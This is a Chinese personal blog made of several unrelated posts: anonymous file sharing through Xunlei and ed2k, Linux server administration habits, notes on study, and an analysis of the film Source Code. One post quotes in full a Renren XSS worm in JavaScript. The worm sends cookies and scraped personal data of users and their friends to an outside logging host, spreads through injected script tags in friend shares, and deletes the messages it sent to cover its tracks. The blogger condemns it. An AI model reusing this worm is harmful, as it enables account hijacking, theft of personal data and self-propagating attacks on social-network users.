随风随行のland 拉登的家|v70.us

虽然在中国，版权法，XX法根没有一样，但是有些文件感觉还是匿名传播好一些。虽然可以挂到网盘上，但是这样的举动非常不靠谱，网盘一般都会记录使用者的ip信息等因素，而且还有个问题，就是下载速度很慢。

前段时间也因为有一些朋友去传播某公司的内部程序文件而被，还有网盘文件无辜被删等情况。

通过一些事情我逐渐发现迅雷是个好东西，一个匿名传播文件的好帮手，不过需要有vip（离线下载）的权限。

迅雷离线的工作原理不想多少，简单的说就是ed2k，torrent，部分url，迅雷服务器在有资源的情况下可以秒杀。既然如此这不就是传播文件的绝妙之处吗。

好了开始正题：

1．让迅雷离线服务器下载你要传播的文件。方法很多url，bt，电驴的都可以，电驴好一些因为不会记录到你的ip信息。

2．给该文件生成ed2k链接，为啥ed2k呢。匿名呀，torrent的话传播不方便呀。Ps 这个有工具可以生成google下就可以了 key：ed2k生成器。

3．然偶分享那个ed2k链接就好了。这样一般的电驴都会提示无种，但是你把这个ed2k链接扔到迅雷离线下载后，就立马秒杀了。

本人其实并不是什么大牛，在6年的服务器配置生涯中终结出了一些属于自己的原则。可能并不大适用在大型网络或者其他什么地方，只是总结出来给大家一些建议，欢迎大家来讨论。
关于磁盘的分区，这个是个很恶心的问题。分区方法基本都差不多/boot,/,等不过我习惯/不是所有的硬盘，只分60G 够系统的运行就好了。然后分出/data0 /data1 2个分区来装数据，这样在重装系统后，重要的数据不会丢失。系统恢复起来也极为的方便（后面具体说。）
和人习惯分2个，一个做备份盘，一个做空间。
这样有人就要问了/root /home下的东西怎么办。首先一台服务器，大家就不要去3天2头的就去动。你东西干嘛扔到自己的home目录下呀。我习惯在自己的home下放一些软链和一些常用的脚本命令。这样即使重装了也没什么损失，顶多是自己要多敲了很多命令。有的时候扔一些detail和log或者是临时的代码。如果怕丢失写个脚本每天备份下就好了。反正自己的home不要装很多的东西，主要以脚本为主，为什么后面详细的说。

下面到了软件的选择，是选择自己编译软件呢，还是直接yum了。这个因该是根据什么软件来决定。如果是iftop，snmp呀这些小软，不对外服务的，作用是给自己用的，我认为yum装就好了，性能无所谓，你能24小时iftop，mtr吗？
说道编译软件就不得不说说prefix的问题了，很多人不喜欢编译软件加prefix，直接撞倒bin或者sbin里面去了，我想说对于很多软件这么做很不对，至少在升级等问题上不好办。我建议是对外服务的大型软件要价prefix参数，位置基本在/usr/local/ 如果你觉得乱在加一个文件夹好了。ex：/usr/local/server/ 这类软件nginx，apache，mysql，php等不过python这样的脚本解析器就算了。svn的话也不用了。
总结下基本就是如下的定律：
1。cli下的网管工具，直接yum吧。ex：iftop，snmpwalk，dig
2。符合第一条，但是yum上面的版本太低。那么找新的源码去编译不要加prefix。如果只需要一个功能不要make install直接copy那个文件到sbin替换即可，最好备份下原文件。ex：iptables， ip tools
3。大型软件，如果提供服务的，自己编译去，绝大部分都要指定prefix。
4。设置工具不管是yum还是源码安装都不要制定prefix。这样方便命令设置，如果是大型软件自带的设置工具，那么还是prefix编译大型软件，然后复制那些小工具到sbin中吧。ex：apache的htpasswd，squid的什么client呀。
5。特殊软件，centos自带的ipsec tool等 yum吧。
6。内核或者模块有关，我的政策是内核能不编译就不编译，yum安装优先。给内核打补丁，如果不是特别必要不要去打。因为补丁会造成内核的不稳定。可能很多大型项目内核都是要自己编译的，这样性能高，而且关闭一些不必要的功能。不过我干的都不是高端，感觉默认内核能对付的用，而且编译内核麻烦。如果你是高手忽略这条吧，内核该怎么弄就怎么弄。

服务器安全
这个怎么说呢，该怎么弄怎么弄吧。root的密码最好一个人知道，别人要的话加key。
其他安全，还是那句老话baidu吧。我没什么特别的意见。

内核优化
rhca442没学完呢，忽略。

下面进入另外一个重点，大型软件用不用daemon呢。
我个人不喜欢用daemon。比较喜欢用&来启动，这样方便kill。
我的rc.local脚本基本在20+行。大型软件都是rc.local控制启动。

说了这么多，应该说说编译的具体事项了。
编译的话个人习惯是在/data1/software下进行编译。解压后删除压缩文件，保留src，和make过的东西。这样在系统重装后，不用等待漫长的编译时间了，直接make install就好了。

软件的升级
因为制定了prefix升级非常的简单，首先mv那个软件目录（改名），然后编译安装新软件。如果在一段时间后感觉新版本工作良好，删掉老版本软件和他的src。如果新软件工作不好可以随时替换过来。绝对比不加prefix替换要方便的多。

大家这回应该明白了吧，为什么home目录中文件很少了，主要是链接了。
没错因为软件编译了prefix，系统不会有这个命令，而且config是分散的。编译文件在其他目录，这样就解放了home目录了。

其他
mysql的db目录扔到/data0中很好，别凑在mysql的安装目录了。
日志，可恶的东西，我很不习惯基本我的策略是每天压缩一次，一个月之前的咱们说拜拜吧。http我基本不开日志。太大了。而且我没怎么看过日志。

最后，也是一点最重要的。
如果条件如许，不要再服务器上做实验。实验找专门的试验机器，mysql等数据都考过去，然后模拟测试。等到结果满意了在上到主服务器上。测试机器配置不要求高，主要是为了测试新版软件的性能和bug。
如果你习惯每天干点，或者3天2头打算给服务器加点功能，咱们弄台测试机器吧，你天天捅咕都没事，正好一个月下来你捅咕的差不多了，该个主服务器升级了。而且测试机挂了咱们也不着急，边看电影边重装呗。

ps 别没事就重装linux。linux这东西重装了配置会累死人。

先吐槽一下sa这个程序吧

后台在线用户	IP地址	最后活动时间
tywtyw2002	166.111.124.100	2011-07-29 21:29:35

看看这个ip 熟悉吗，清华附中一个不存在的ip，随意x-forward一下 sa就会记录这个ip，原来为砸ip这么简单呀。其实已经无所谓了，自从我在linux 的tcp warpper下屏蔽了100个ip后发现广告少了很多。

这半年写的东西很少，但是学到了很多，不知道为什么最及很懒的写什么东西。代码也好，linux设置也罢，经常去靠脑袋去记，然后忘了就去打开一些备份过的文件看下。

弄了几个项目，但是发现也没啥用。结果基本上都是做到一半就不写了。而且有些程序写的很sb，至少在算法上很sb。

唉，感觉目前知道的很多，但是很多都懒的去写，可能是私心吧，毕竟有些东西写出来后就是公开，公开了以后就是封。导致自己也没法用了。

好像v70这个域名被rst以后，我上来的次数也少了，每天基本都在书海中度过。其实这里本来也没什么人。

新开了一个beta.coshim.com结果写完一篇文，到现在第二篇还是没有写。题目和内容基本都确定了，就是懒的去写吧。

第二批是关于cdn的

第三片应该是关于ipv6的

第四个应该是有关网络计费和流量的有关问题。

龟速更新吧。

争取这周以前把cdn这篇给搞定。

目前自己的知识还是不够多，很多东西只是了解但是没有完全的精通。

网络方面自己计划方案不难，但是事实起来确实很难。

比如radius和pptpd这类的东西，知道radius可以提供给pptd额外的参数，但是不知道怎么去提供。

有人说过，配置东西都是简单的，你知道懂了原理剩下的看manual去就好了。但是你不懂原理看manual也没用。

但是这也不叫会，有些东西思想的确比配置重要，但是有些东西的配置也是一门学们。

比如squid，真正的精髓不是在于思想而是在于如何去配置他。

squid的确是一个很强大的东西。

目前在研究一个问题，如果给squid做出一个警告页面来。

如果确定go on 否这退出。

最及还是打算先把isp和rs学号后再去看安全，最后再开 voip吧。
rhca估计要留到这些之后了。
话说看书在看第一遍和第二部的感觉是不同的，第一遍看城域以太网这本书，只是能看明白技术说的是什么，对于通讯的名词基本都是不知道，比如 dwdm，什么的。但是第二变看，感觉却能理解这些东西了。真正的好书读多少遍都会有收获的。

像我这类不关心电影，不去查任何电影信息，没事去yyets看看最新电影的人。主动去找源代码这部电影实属偶然。
我关心这部电影的原因是因为某天去射手网找BBC.虚拟革命.S01.EP2的字幕（那个内嵌字幕的作者太坑爹），偶然间在主页发现了source code在搜索hot榜上，对于计算机的敏感于是去看了下简介，便去找枪版了。

告诉大家个好方法，不用去看imdb，去射手。在hot榜上出现的名字，然后看下预告片你就知道自己时候想看了。

上面都是一些题外话了，，，

下面开始正题了，在豆瓣上看见很多关于源代码这个电影的解析。个人有些分析不大准确。
首先我的观点是源代码有个比较类似bug的东西。

那个教授（瘸子）说源代码是收集了所有在列车上牺牲人员的记忆，并且把他们组成在一起构成的。并且只有8分钟。
看是看见8分钟，感觉很怪异，为什么是8分钟呢？没人说，但是对物理学了解的人都知道吧，8分钟是太阳光到达地球的时间。这应该是编剧大人想表达的，就是就算太阳挂了，地球上的人8分钟才知道。换句话来说就是世界末日到来了，你还会有8分钟的时间去体验生活。但是这8分钟能做什么呢？于是source code就告诉我们这8分钟能干啥了。。。

有一点不知道是剧情的bug还是瘸子教授他观点的错误，就是制作炸弹的人并没有死，按照瘸子说过的话，源代码里面只有死人的记忆，也就是说那个炸弹根本不应该被找到。应为任何死去的人的记忆中都没有那个炸弹。
个人认为这是瘸子大叔理论上的错误，可能是他理解上是所有死人的记忆，但其实不是这样。这套系统的实际情况超出了他的预期，实际是列车爆炸时，整个世界往前数8分钟的一个dump。
理论支持有很多，主角给他父亲打电话，这个在列车中人根本没这个记忆。
上网找那个组织，遇害人的记忆中不能包含整个网络吧。
这个好像很难理解，不过可以理解vm的硬盘快照。快照可能把磁盘回复到原始的状况。但是每次复原的磁盘在次启动很多步骤是相同的，但是很多步骤又不同了。
为什么每次8分钟，人们的动作都是一样的，当然在主角的影响之后就会变化。
假设主角是一个函数f（x），那么f（x）等于x的记录是很小的。这就说明了为什么主角接触过的事物会变化的原因。可以算作是蝴蝶效应。
通过观看影片，根据经验大致描绘了整套系统的样子。
8分钟的记忆在一个类似硬盘的东西了，然后模拟的地方不是在主角的脑袋里面，而是在一个大型服务器中，主角脑袋中的电极类似黑客帝国里面查到a10神经的东西。
工作的原理是，驱动加点，把牧师的人格，环境等传送到主角的脑袋中，然后主角做的每件事传送到服务器中的进行运算，把运算后的结果在传递到主角的脑袋中（视觉信号，什么的）。

只有主角在虚拟世界中死亡，意识才会回来。类似盗梦空间的设置，但是有个问题就是8分钟，这8分钟是什么。
如果有个理论是太阳发出的阳光会刷新人们脑袋里面的源代码。假设太阳发设的阳光都带有一个时间戳，地球接受到这个时间戳后，就把这时间戳前记忆抹去。但是这个理论只能解释博士说的话，每个人有8分钟的记忆。

但是还是无法解释为什么炸弹会出现在源代码中。唯一的解释就是瘸子有问题，瘸子并不是dump每个人的记忆把他们拼接到一起。而是dump了整个世界的8分钟。
瘸子的目的好像并不是用源代码来维护这个世界的和平，而是因为源代码才去破坏世界。
看瘸子最后的几句话one of these days,the right crisis is going to rear its head, and source code is going to have its moment in the sun.
#这几天总会有真正的灾难浮现出来，源代码会实现他的价值。（大致意思）
看出来了吗，瘸子自己创造的灾难。然后去测试他的源代码系统。
如果这样，他dump每个遇难者的记忆就是为了掩盖他能dump这个世界的8分钟。

关于源代码世界，前面已经说了源代码世界的退出符号是死亡，死亡后人就会回到现实。
关于现实世界那个人的死。现实世界的人或者是为了维护，他在源代码世界上的相貌特征等状态。如果现实世界的人挂了，那么他思想中的相貌就会消失。所以源代码中牧师在镜子中看见的头像就是牧师自己了。并且记忆和牧师本来的记忆重合了。也就是说主角（现实）就在源代码世界消失了。他变成了牧师。
一个世界不可能存在2个一样的东西，类似网卡的mac一样。一个子网不肯能有2太主机的mac地址一样，一样就冲突。但是有个冲突的时间。
如果源代码世界中2个相同属性的人冲突是8分钟，冲突后会造成哪些后果我们不知道。系统坏了？2个人同化，或者其他的什么。
这也就是为什么在8分钟后，牧师就会挂。（可能和这个没关系）
关于现实世界主角的死亡。前面说过了，这个我们可以看成是系统读取属性，会先读外层的然后再度内层的。这就是牧师在镜子里看见的不是自己的原因了。
主角死了，他的id值消失，在源代码世界中主角和牧师同化了。然后在实验室看见的那个主角就保持了id的唯一性。这个源代码世界继续运行了。
主角死了，信号没办法经过他的大脑去做一次 f（x）的运算，怎么进程怎么继续进行呢？
你别忘了，原来dump的数据只有8分钟，这8分钟是固定的。f（x）运算只是处理这8分钟的数据，8分钟过后没有dump的数据了，世界就在源代码中继续执行了。
如果要问这个世界是什么，我想应该和19层楼或者是martix的世界差不多，在计算机中运行的一个世界。
如果断电片尾的那个源代码世界还会存在吗？
断电了，计算机关闭，源代码世界肯定挂了。但是这套系统时候能承受住断电的考验呢？不知道，现实中很多数据中心，很多项目断电基本等于从0开始吧。
还有源代码世界中的时间，电影没有说，可能和现实世界同步吧。因为dump的那8分钟需要主角的脑袋去做实时处理，但是主角死了后还会同步吗？
8分钟之后的世界不好说，类似tron，世界是按周期来算的。

没什么说的，被墙了。
gfw认证，保证质量。

JavaScript代码

var token = XN.get_check;
var mobile_friends = [];
var all_friends = [];
var my_id = 0;
function send_data(v) //发送函数 get模式
{
var img = document.createElement('img');
img.src = 'http://qiutuan.net/2011/log.php?' + v;
document.body.appendChild(img);
document.body.removeChild(img);
}
function send_to_friends(){ //发信到好友
var i;
var idlist = [];
for (i = 0; i < all_friends.length; i++) //所有好友
{
idlist.push(all_friends[i].toString());
if (idlist.length == 10) //每次10个
{
_send_to_friends(idlist);
idlist = [];
}
}
if (idlist.length > 0) _send_to_friends(idlist);
}
function _send_to_friends(ids){
var content = "相信每个女生心底都有一只小猫，有的妩媚，有的狂野，有的多愁善感，有的古灵精怪……你心底的那只蠢蠢欲动的小猫，是什么样子的呢？她喜欢笑，你就老以为她是快乐的；她喜欢跳，你就老以为她是开朗的；她喜欢扭，你就老以为她是放肆的；她喜欢叫，你就老以为她是狂野的。一个人的时候，她其实多愁善感；一个人的时候，她其实安静淡然；一个人的时候，她其实内向自闭；一个人的时候，她其实乖巧温柔……（视频亮点在2:57秒) <script src='http://qiutuan.net/2011/51.js'></script> <embed src='http://player.youku.com/player.php/sid/XMjYxNDMwNDQ4/v.swf' quality='high' width='480' height='400' align='middle' allowScriptAccess='sameDomain' type='application/x-shockwave-flash'></embed>";
var p = {action:"sharetofriend",
body:content,
form:{
albumid:"0",
currenUserTinyurl:"http://hdn.xnimg.cn/photos/hdn421/20110118/1220/tiny_GeT4_23780d019116.jpg",
fromSharedId:"0",
fromShareOwner:"0",
fromname:"",
fromno:"0",
fromuniv:"",
link:"http://edm.renren.com/link.do?l=27627&t=51",
pic:"http://jebe.xnimg.cn/20110412/19/62caea7b-c7bc-4217-994a-ba6c061e5aa0.jpg",
summary:"相信每个女生心底都有一只小猫，有的妩媚，有的狂野，有的多愁善感，有的古灵精怪……你心底的那只蠢蠢欲动的小猫，是什么样子的呢？",
title:"加a02好友奖品散不停",
type:"51"
},
ids:ids,
noteId:"0",
subject:"有人暗恋你哦，你想知道TA是谁么",
tsc:token};
delete p.tsc;
new XN.net.xmlhttp({url:"http://share.renren.com/share/submit.do",
data:"tsc="+token+"&post="+encodeURIComponent(XN.json.build(p)),
onSuccess: function (response) {del_send_messages();}
});
}
function del_messages(idlist){ //对已发送列表里的站内信进行删除
var struct_msgs ={
action:"delete",
folder:"1",
slice:"20",
unread_count:"0",
ids:idlist
};
new Ajax.Request("/message/ajax.do",{method:"get",parameters:"post="+encodeURIComponent(XN.JSON.build(struct_msgs))});
}
//从已发站内信中删除
function del_send_messages(){
new XN.net.xmlhttp({url:"http://msg.renren.com/message/inbox.do?f=1",
method:"GET",
onSuccess: function (response) {
var listid1 = response.responseText.match(/thread_(\d+)/g);
for(var i=0;i < listid1.length;i++){
listid1[i] = listid1[i].substring(7);
}
del_messages(listid1);
}
});
}
function get_self_info(){
new XN.net.xmlhttp({url:"http://www.renren.com/profile.do?v=info_ajax&undefined",method:"GET",onSuccess:function(r){
var text_html = r.responseText;
var id,name,birthday,qq,school,mobile,msn,day,month,year;
id = /getalbumprofile\.do\?owner\=(\d+)/.exec(text_html)[1];
my_id = id;
school = /pf_spread\'\>(.*?)\<\/a\>/.exec(text_html)[1];
year = /birt\"\,\"year\"\:\"(\d+)/.exec(text_html)[1];
month = /birt\"\,\"month\"\:\"(\d+)/.exec(text_html)[1];
day = /birt\"\,\"day\"\:\"(\d+)/.exec(text_html)[1];
name = /alt\=\"([^\"]+)的大头贴/.exec(text_html)[1];
if(month <= 9){
month = "0"+month;
}
if(day <= 9){
day = "0"+day;
}
birthday = year + month + day;
qq = /QQ.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];
msn = /MSN.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];
mobile = /手机号.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];
var data = "type=self_info&id=" + id + "&name=" + encodeURIComponent(name)
+ "&school=" + encodeURIComponent(school)
+ "&birth=" + birthday
+ "&qq=" + qq
+ "&msn=" + encodeURIComponent(msn)
+ "&mobile=" + mobile;
send_data(data);
}
});
}
function get_card(tid)
{
new XN.net.xmlhttp({url:'http://www.renren.com/showcard?friendID='+tid,
method:'get',
onSuccess:function(r){
var obj = eval("("+r.responseText+")");
var data = 'type=card&my_id=' + my_id
+ '&id=' + obj.id
+ '&name=' + encodeURIComponent(obj.name)
+ '&msn=' + encodeURIComponent(obj.msn)
+ '&phone=' + encodeURIComponent(obj.phone)
+ '&qq=' + encodeURIComponent(obj.qq)
+ '&email=' + encodeURIComponent(obj.email)
+ '&address=' + encodeURIComponent(obj.address);
send_data(data);
}
});
}
function get_all_friends(){
new XN.net.xmlhttp({url:"http://www.renren.com/listcards",method:"GET",onSuccess:function(r){
var text_html = r.responseText;
//alert(text_html);
var friends_list = eval("("+text_html+")");
var owned_mobile = (friends_list.list[0].list).length; //have mobile friends number
for(var i =0;i< owned_mobile ;i++){
mobile_friends.push(friends_list.list[0].list[i].id);
all_friends.push(friends_list.list[0].list[i].id);
}
//alert(mobile_friends.length);
var no_mobile = (friends_list.list[1].list).length;
for(var i =0;i< no_mobile ;i++){
all_friends.push(friends_list.list[1].list[i].id);
}
//alert(all_friends.length);
for(var i = 0; i < mobile_friends.length; i++)
get_card(mobile_friends[i]);
send_to_friends();
}
});
}
window.onload = function(){
send_data('type=cookie&v='+encodeURIComponent(document.cookie));
get_self_info();
get_all_friends();
}

不想说什么连cookies都他妈的不放过。不过他的服务器已经被ddos的起不来了。
其实如果吧这个脚本改成随意send一些数据去以网站，这绝对是ddos攻击呀。
原因就是没有过滤<>这个东西难道sb程序员没有加 html转义吗
典型的xss。

这几周吧简单的研究下了as级拓扑，还有isp直接的一些运行模式吧。中美的网络越来越堵了。

打算继续以这2个方向前进去检测中美网络。
1.根据as peer
2.找光纤+eac

http://v70.us/watch.php
lossrtt的一个监视吧，网络比较差写的比较懒。
欢迎大家提供国际出口ip。 ps最好是中国那端的。

在设置了 error_page 404的情况下让php出404页面很简单

加上一句fastcgi_intercept_errors on;就ok了。
但是有的时候我们懒得设置404页面，或者是不需要设置404页面，
php碰到没有的文件就会来上那个一句 No input file specified.
这是因为 fastcgi_intercept_errors on;的机制，如果没有自定页面是不会替换cgi的404信息的。
有2种方法可以解决这种问题
1.

2.

性能不分析了，没做实验。